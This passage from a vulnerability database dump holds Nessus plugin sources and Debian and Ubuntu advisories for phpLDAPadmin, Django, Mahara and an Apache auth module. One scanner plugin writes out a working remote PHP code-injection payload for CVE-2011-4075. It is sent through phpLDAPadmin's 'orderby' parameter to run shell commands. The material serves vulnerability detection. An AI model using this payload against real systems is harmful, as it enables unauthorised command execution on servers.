script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^16([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 16.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC16\", reference:\"phpldapadmin-1.2.1.1-2.20111006git.fc16\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"phpldapadmin\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-12T10:09:17", "description": "Update to the latest upstream development code to fix CVE-2011-4074\nand CVE-2011-4075 (XSS and code injection vulnerabilities in versions\n<= 1.2.1.1)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 28, "published": "2011-11-26T00:00:00", "title": "Fedora 14 : phpldapadmin-1.2.1.1-2.20111006git.fc14 (2011-14986)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4074", "CVE-2011-4075"], "modified": "2011-11-26T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:14", "p-cpe:/a:fedoraproject:fedora:phpldapadmin"], "id": "FEDORA_2011-14986.NASL", "href": "https://www.tenable.com/plugins/nessus/56935", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2011-14986.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(56935);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2011-4074\", \"CVE-2011-4075\");\n script_xref(name:\"FEDORA\", value:\"2011-14986\");\n\n script_name(english:\"Fedora 14 : phpldapadmin-1.2.1.1-2.20111006git.fc14 (2011-14986)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Update to the latest upstream development code to fix CVE-2011-4074\nand CVE-2011-4075 (XSS and code injection vulnerabilities in versions\n<= 1.2.1.1)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=748537\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2011-November/069724.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?78d671d2\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected phpldapadmin package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"phpLDAPadmin 1.2.1.1 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'phpLDAPadmin query_engine Remote PHP Code Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:phpldapadmin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:14\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/11/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/10/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/11/26\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^14([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 14.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC14\", reference:\"phpldapadmin-1.2.1.1-2.20111006git.fc14\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"phpldapadmin\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-20T13:26:25", "description": "The version of phpLDAPadmin installed on the remote host does not\nsanitize input to the 'orderby' parameter of the 'cmd.php' script when\n'cmd' is set to 'query_engine' before using it in a call to\n'create_function()'.\n\nAn unauthenticated, remote attacker can leverage this issue to execute\narbitrary PHP code on the affected host, subject to the privileges\nunder which the web server runs.", "edition": 27, "published": "2011-11-03T00:00:00", "title": "phpLDAPadmin orderby Parameter Arbitrary PHP Code Execution", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4075"], "modified": "2011-11-03T00:00:00", "cpe": ["cpe:/a:deon_george:phpldapadmin"], "id": "PHPLDAPADMIN_ORDERBY_CMD_EXEC.NASL", "href": "https://www.tenable.com/plugins/nessus/56703", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\n\nif (description)\n{\n script_id(56703);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2011-4075\");\n script_bugtraq_id(50331);\n script_xref(name:\"EDB-ID\", value:\"18021\");\n script_xref(name:\"EDB-ID\", value:\"18031\");\n\n script_name(english:\"phpLDAPadmin orderby Parameter Arbitrary PHP Code Execution\");\n script_summary(english:\"Tries to run a command\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote web server hosts a PHP application that can be abused to\nexecute arbitrary PHP code.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The version of phpLDAPadmin installed on the remote host does not\nsanitize input to the 'orderby' parameter of the 'cmd.php' script when\n'cmd' is set to 'query_engine' before using it in a call to\n'create_function()'.\n\nAn unauthenticated, remote attacker can leverage this issue to execute\narbitrary PHP code on the affected host, subject to the privileges\nunder which the web server runs.\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"http://sourceforge.net/support/tracker.php?aid=3417184\");\n # http://phpldapadmin.git.sourceforge.net/git/gitweb.cgi?p=phpldapadmin/phpldapadmin;h=76e6dad\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4d5eab60\");\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Apply the patch to 'lib/functions.php' in the project's GIT\nrepository.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"phpLDAPadmin 1.2.1.1 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'phpLDAPadmin query_engine Remote PHP Code Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\nscript_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/10/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/10/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/11/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:deon_george:phpldapadmin\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2011-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"phpldapadmin_detect.nasl\", \"os_fingerprint.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_keys(\"www/PHP\", \"www/phpLDAPadmin\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"url_func.inc\");\ninclude(\"webapp_func.inc\");\ninclude(\"data_protection.inc\");\n\nport = get_http_port(default:80, php:TRUE, embedded:FALSE);\n\n\ninstall = get_install_from_kb(appname:\"phpLDAPadmin\", port:port, exit_on_fail:TRUE);\ndir = install['dir'];\n\n\n# Try to exploit the issue to run a command.\nos = get_kb_item(\"Host/OS\");\nif (os && report_paranoia < 2)\n{\n if (\"Windows\" >< os) cmd = 'ipconfig /all';\n else cmd = 'id';\n\n cmds = make_list(cmd);\n}\nelse cmds = make_list('id', 'ipconfig /all');\n\ncmd_pats = make_array();\ncmd_pats['id'] = \"uid=[0-9]+.*gid=[0-9]+.*\";\ncmd_pats['ipconfig'] = \"Subnet Mask\";\n\nsemaphore = '_' + SCRIPT_NAME - '.nasl' + '_';\n\n# We need a cookie for the exploits to work.\ninit_cookiejar();\n\nurl = dir + '/';\nres = http_send_recv3(port:port, method:\"GET\", item:url, exit_on_fail:TRUE);\n\nforeach cmd (cmds)\n{\n payload = 'nessus));}}' +\n 'error_reporting(0);' +\n 'print(' + semaphore + ');' +\n 'passthru(base64_decode($_SERVER[HTTP_CMD]));' +\n 'die;/*';\n\n url = dir + '/cmd.php?' +\n 'cmd=query_engine&' +\n 'query=none&' +\n 'search=1&' +\n 'orderby=' + urlencode(str:payload, unreserved:\"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_!~*'()-]/=;<>$[]\");\n\n res = http_send_recv3(\n port : port,\n method : \"GET\",\n item : url,\n add_headers : make_array(\"Cmd\", base64(str:cmd)),\n exit_on_fail : TRUE\n );\n\n if (\n semaphore >< res[2] &&\n egrep(pattern:cmd_pats[cmd], string:res[2])\n )\n {\n if (report_verbosity > 0)\n {\n output = strstr(res[2], semaphore) - semaphore;\n if (!egrep(pattern:cmd_pats[cmd], string:output)) output = \"\";\n\n report =\n '\\nNessus was able to verify the issue exists using the following request :' +\n '\\n' +\n '\\n' + crap(data:\"-\", length:30)+' snip '+ crap(data:\"-\", length:30) +\n '\\n' + http_last_sent_request() +\n '\\n' + crap(data:\"-\", length:30)+' snip '+ crap(data:\"-\", length:30) + '\\n';\n\n if (report_verbosity > 1)\n {\n report +=\n '\\n' + 'This produced the following output :' +\n '\\n' +\n '\\n' + crap(data:\"-\", length:30) + \" snip \" + crap(data:\"-\", length:30) +\n '\\n' + data_protection::sanitize_uid(output:chomp(output)) +\n '\\n' + crap(data:\"-\", length:30) + \" snip \" + crap(data:\"-\", length:30) + '\\n';\n }\n\n report +=\n '\\n' + 'Note that the Cookie header in the request above uses a value' +\n '\\n' + 'returned after visiting the application\\'s initial page. The value' +\n '\\n' + 'reported above may have expired and need to be updated in order to' +\n '\\n' + 'validate the finding.';\n\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n exit(0);\n }\n}\nexit(0, \"The phpLDAPadmin install at \"+build_url(port:port, qs:dir+'/')+\" is not affected.\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-07T10:52:55", "description": "The remote host is affected by the vulnerability described in GLSA-201110-23\n(Apache mod_authnz_external: SQL injection)\n\n mysql/mysql-auth.pl in mod_authnz_external does not properly sanitize\n input before using it in a SQL query.\n \nImpact :\n\n A remote attacker could exploit this vulnerability to inject arbitrary\n SQL statements by using a specially crafted username for HTTP\n authentication on a site using mod_authnz_external.\n \nWorkaround :\n\n There is no known workaround at this time.", "edition": 21, "published": "2011-10-26T00:00:00", "title": "GLSA-201110-23 : Apache mod_authnz_external: SQL injection", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-2688"], "modified": "2011-10-26T00:00:00", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:mod_authnz_external"], "id": "GENTOO_GLSA-201110-23.NASL", "href": "https://www.tenable.com/plugins/nessus/56635", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201110-23.\n#\n# The advisory text is Copyright (C) 2001-2016 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(56635);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2011-2688\");\n script_bugtraq_id(48653);\n script_xref(name:\"GLSA\", value:\"201110-23\");\n\n script_name(english:\"GLSA-201110-23 : Apache mod_authnz_external: SQL injection\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201110-23\n(Apache mod_authnz_external: SQL injection)\n\n mysql/mysql-auth.pl in mod_authnz_external does not properly sanitize\n input before using it in a SQL query.\n \nImpact :\n\n A remote attacker could exploit this vulnerability to inject arbitrary\n SQL statements by using a specially crafted username for HTTP\n authentication on a site using mod_authnz_external.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201110-23\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All Apache mod_authnz_external users should upgrade to the latest\n version:\n # emerge --sync\n # emerge --ask --oneshot --verbose\n '>=www-apache/mod_authnz_external-3.2.6'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:mod_authnz_external\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/10/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/10/26\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"www-apache/mod_authnz_external\", unaffected:make_list(\"ge 3.2.6\"), vulnerable:make_list(\"lt 3.2.6\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Apache mod_authnz_external\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "debian": [{"lastseen": "2020-11-11T13:30:13", "bulletinFamily": "unix", "cvelist": ["CVE-2011-4136", "CVE-2011-4137", "CVE-2011-4140", "CVE-2011-4138", "CVE-2011-4139"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2332-1 security@debian.org\nhttp://www.debian.org/security/ Thijs Kinkhorst\nOctober 29, 2011 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : python-django\nVulnerability : several issues\nProblem type : remote\nDebian-specific: no\nCVE ID : CVE-2011-4136 CVE-2011-4137 CVE-2011-4138 CVE-2011-4139 \n CVE-2011-4140 \nDebian Bug : 641405\n\nPaul McMillan, Mozilla and the Django core team discovered several\nvulnerabilities in Django, a Python web framework:\n\nCVE-2011-4136\n\n When using memory-based sessions and caching, Django sessions are\n stored directly in the root namespace of the cache. When user data is\n stored in the same cache, a remote user may take over a session.\n\nCVE-2011-4137, CVE-2011-4138\n\n Django&#x27;s field type URLfield by default checks supplied URL&#x27;s by\n issuing a request to it, which doesn&#x27;t time out. A Denial of Service\n is possible by supplying specially prepared URL&#x27;s that keep the\n connection open indefinately or fill the Django&#x27;s server memory.\n\nCVE-2011-4139\n\n Django used X-Forwarded-Host headers to construct full URL&#x27;s. This\n header may not contain trusted input and could be used to poison the\n cache.\n\nCVE-2011-4140\n\n The CSRF protection mechanism in Django does not properly handle\n web-server configurations supporting arbitrary HTTP Host headers,\n which allows remote attackers to trigger unauthenticated forged\n requests.\n\nFor the oldstable distribution (lenny), this problem has been fixed in\nversion 1.0.2-1+lenny3.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 1.2.3-3+squeeze2.\n\nFor the testing (wheezy) and unstable distribution (sid), this problem\nhas been fixed in version 1.3.1-1.\n\nWe recommend that you upgrade your python-django packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 7, "modified": "2011-10-29T05:51:20", "published": "2011-10-29T05:51:20", "id": "DEBIAN:DSA-2332-1:3B784", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2011/msg00209.html", "title": "[SECURITY] [DSA 2332-1] python-django security update", "type": "debian", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-11-11T13:24:13", "bulletinFamily": "unix", "cvelist": ["CVE-2011-2773", "CVE-2011-2772", "CVE-2011-2771"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2334-1 security@debian.org\nhttp://www.debian.org/security/ Moritz Muehlenhoff\nNovember 04, 2011 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : mahara\nVulnerability : several\nProblem type : remote\nDebian-specific: no\nCVE ID : CVE-2011-2771 CVE-2011-2772 CVE-2011-2773 \n\nSeveral vulnerabilities were discovered in Mahara, an electronic \nportfolio, weblog, and resume builder:\n\nCVE-2011-2771\n\n Teemu Vesala discovered that missing input sanitising of RSS\n feeds could lead to cross-site scripting.\n\nCVE-2011-2772\n \n Richard Mansfield discovered that insufficient upload restrictions\n allowed denial of service.\n\nCVE-2011-2773\n\n Richard Mansfield that the management of institutions was prone to\n cross-site request forgery.\n\n(no CVE ID available yet)\n\n Andrew Nichols discovered a privilege escalation vulnerability\n in MNet handling.\n\nFor the oldstable distribution (lenny), this problem has been fixed in\nversion 1.0.4-4+lenny11.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 1.2.6-2+squeeze3.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 1.4.1-1.\n\nWe recommend that you upgrade your mahara packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 3, "modified": "2011-11-04T18:06:19", "published": "2011-11-04T18:06:19", "id": "DEBIAN:DSA-2334-1:F6AD0", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2011/msg00211.html", "title": "[SECURITY] [DSA 2334-1] mahara security update", "type": "debian", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-30T02:21:45", "bulletinFamily": "unix", "cvelist": ["CVE-2011-4074", "CVE-2011-4075"], "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA-2333-1 security@debian.org\nhttp://www.debian.org/security/ Jonathan Wiltshire\nOct 31th, 2011 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : phpldapadmin\nVulnerability : several\nProblem type : remote\nDebian-specific: no\nDebian bug : 646754\nCVE IDs : CVE-2011-4075 CVE-2011-4074\n\nTwo vulnerabilities have been discovered in phpldapadmin, a web based\ninterface for administering LDAP servers. The Common Vulnerabilities and\nExposures project identifies the following problems:\n\nCVE-2011-4074\n\n Input appended to the URL in cmd.php (when &quot;cmd&quot; is set to &quot;_debug&quot;) is\n not properly sanitised before being returned to the user. This can be\n exploited to execute arbitrary HTML and script code in a user&#x27;s browser\n session in context of an affected site.\n\nCVE-2011-4075\n\n Input passed to the &quot;orderby&quot; parameter in cmd.php (when &quot;cmd&quot; is set to\n &quot;query_engine&quot;, &quot;query&quot; is set to &quot;none&quot;, and &quot;search&quot; is set to e.g.\n &quot;1&quot;) is not properly sanitised in lib/functions.php before being used in a\n &quot;create_function()&quot; function call. This can be exploited to inject and\n execute arbitrary PHP code.\n\n\nFor the oldstable distribution (lenny), these problems have been fixed in\nversion 1.1.0.5-6+lenny2.\n\nFor the stable distribution (squeeze), these problems have been fixed in\nversion 1.2.0.5-2+squeeze1.\n\nFor the testing distribution (wheezy), these problems will be fixed soon.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 1.2.0.5-2.1.\n\nWe recommend that you upgrade your phpldapadmin packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 2, "modified": "2011-10-30T12:32:50", "published": "2011-10-30T12:32:50", "id": "DEBIAN:DSA-2333-1:270B2", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2011/msg00210.html", "title": "[SECURITY] [DSA 2333-1] phpldapadmin security update", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-30T02:23:00", "bulletinFamily": "unix", "cvelist": ["CVE-2011-2688"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2279-1 security@debian.org\nhttp://www.debian.org/security/ Steffen Joeris\nJuly 19, 2011 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : libapache2-mod-authnz-external\nVulnerability : SQL injection\nProblem type : remote\nDebian-specific: no\nCVE ID : CVE-2011-2688 \nDebian Bug : 633637\n\nIt was discovered that libapache2-mod-authnz-external, an apache\nauthentication module, is prone to an SQL injection via the $user\nparamter.\n\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 3.2.4-2+squeeze1.\n\nThe oldstable distribution (lenny) does not contain\nlibapache2-mod-authnz-external\n\nFor the testing distribution (wheezy), this problem will be fixed soon.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 3.2.4-2.1.\n\n\nWe recommend that you upgrade your libapache2-mod-authnz-external packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 2, "modified": "2011-07-19T09:06:09", "published": "2011-07-19T09:06:09", "id": "DEBIAN:DSA-2279-1:127D6", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2011/msg00153.html", "title": "[SECURITY] [DSA 2279-1] libapache2-mod-authnz-external security update", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-30T02:21:46", "bulletinFamily": "unix", "cvelist": ["CVE-2011-2688"], "description": "Amaya Rodrigo uploaded new packages for libapache2-mod-authnz-external\nwhich fixed the following security problems:\n\nCVE-2011-2688 \n\tRemotely exploitable SQL injection in the mysql auth module.\n\nFor the lenny-backports distribution the problems have been fixed in\nversion 3.2.4-2~bpo50+1.1.\n\nFor the stable distribution (squeeze) the problems have been fixed in\nversion 3.2.4-2.1+squeeze1.\n\nIf you don&#x27;t use pinning (see [1]) you have to update the package\nmanually via &quot;apt-get -t lenny-backports install &lt;packagelist&gt;&quot; with the\npackagelist of your installed packages affected by this update.\n[1] &lt;http://backports.debian.org/Instructions&gt;\n\nWe recommend to pin (in /etc/apt/preferences) the backports repository\nto 200 so that new versions of installed backports will be installed\nautomatically.\n\n Package: *\n Pin: release a=lenny-backports\n Pin-Priority: 200\n\n\n-- \n .&#x27;&#x27;`. Ex nihilo nihil fit\n: :&#x27; :\n`. `&#x27;\n `- Proudly running Debian GNU/Linux\n", "edition": 2, "modified": "2011-08-04T10:38:52", "published": "2011-08-04T10:38:52", "id": "DEBIAN:BSA-042:A3B69", "href": "https://lists.debian.org/debian-backports-announce/2011/debian-backports-announce-201108/msg00000.html", "title": "[BSA-042] Security Update for libapache2-mod-authnz-external", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "ubuntu": [{"lastseen": "2020-07-09T00:21:12", "bulletinFamily": "unix", "cvelist": ["CVE-2011-4136", "CVE-2011-4137", "CVE-2011-4138", "CVE-2011-4139"], "description": "Pall McMillan discovered that Django used the root namespace when storing \ncached session data. A remote attacker could exploit this to modify \nsessions. (CVE-2011-4136)\n\nPaul McMillan discovered that Django would not timeout on arbitrary URLs \nwhen the application used URLFields. This could be exploited by a remote \nattacker to cause a denial of service via resource exhaustion. \n(CVE-2011-4137)\n\nPaul McMillan discovered that while Django would check the validity of a \nURL via a HEAD request, it would instead use a GET request for the target \nof a redirect. This could potentially be used to trigger arbitrary GET \nrequests via a crafted Location header. (CVE-2011-4138)\n\nIt was discovered that Django would sometimes use a request's 